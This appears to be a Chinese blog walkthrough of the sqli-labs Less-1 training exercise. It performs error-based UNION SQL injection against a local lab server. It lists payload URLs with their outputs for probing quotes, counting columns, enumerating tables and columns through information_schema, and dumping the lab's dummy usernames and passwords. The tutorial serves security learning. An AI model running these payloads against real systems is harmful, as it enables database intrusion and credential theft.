sql-labs-less1 基于显错的union注入全过程

sql-labs-less1 GET - Error based - Single quotes - String

step0 准备

http://localhost/sqli-labs/Less-1/

HackBar

MySQL

Apache

step1 测试

首先我们假装不知道后台的代码。其中sql查询语句为sql=“SELECT * FROM users WHERE id=’$id’ LIMIT 0,1”;

payload:	
http://localhost/sqli-labs/Less-1/?id=1 --+

mysql:		
SELECT * FROM users WHERE id='1' LIMIT 0,1

result:		
Your Login name:Dumb
Your Password:Dumb
payload:
http://localhost/sqli-labs/Less-1/?id=1' --+

result:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
payload:
http://localhost/sqli-labs/Less-1/?id=1‘ and 1=1 --+

result:
Your Login name:Dumb
Your Password:Dumb
payload:
http://localhost/sqli-labs/Less-1/?id=1' and 1=2 --+

result:
none!

结论:所以该网站可能存在sql注入漏洞,接下里用order by 1-99语句查询该数据表的字段数量。

payload:
http://localhost/sqli-labs/Less-1/?id=1' order by 2 --+

result:
Your Login name:Dumb
Your Password:Dumb

payload:
http://localhost/sqli-labs/Less-1/?id=1' order by 3 --+

result:
Your Login name:Dumb
Your Password:Dumb

payload:
http://localhost/sqli-labs/Less-1/?id=1' order by 4 --+

result:
Unknown column '4' in 'order clause'

结论:所以字段数为3。

payload:
http://localhost/sqli-labs/Less-1/?id=1' union select 1,2,3--+

result:
Your Login name:Dumb
Your Password:Dumb

这里成功执行,但没有返回union select的结果,这是由于代码只返回第一条结果,所以union select获取的结果没有输出到页面。于是设置id=-1,这样可以显示后者的结果。

payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,3--+

result:
Your Login name:2
Your Password:3

返回的结果为2,3,意味着union select 1,2,3中,2和3的位置可以输入MySQL语句,于是我们尝试在3的位置查询当前数据库名(database()函数)

payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,database()--+

result:
Your Login name:2
Your Password:security

数据库名:security

step2 注入

接下来,来说获取表名

payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select table_name from information_schema.tables where table_schema='security' limit 0,1) --+

result:
Your Login name:2
Your Password:emails

这里可以修改limit 0,1。改为group_concat函数可以获得所有表名。

payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security') --+

result:
Your Login name:2
Your Password:emails,referers,uagents,users

这里以users为例,下一步是获取字段名。

payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1) --+

result:
Your Login name:2
Your Password:id

这里可以修改limit 0,1。改为group_concat函数可以获得所有字段名。

payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' ) --+

result:
Your Login name:2
Your Password:id,username,password

最后爆出用户名和密码

payload:
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,(select group_concat(concat(username,':',password)) from security.users ) --+

result:
Your Login name:2
Your Password:Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4

step3 结论

结论如下:

Dumb Dumb
Angelina I-kill-you
Dummy p@ssword
secure crappy
stupid stupidity
superman genious
batman mob!le
admin admin
admin1 admin1
admin2 admin2
admin3 admin3
dhakkan dumbo
admin4 admin4

你可能感兴趣的:(sql注入,mysql)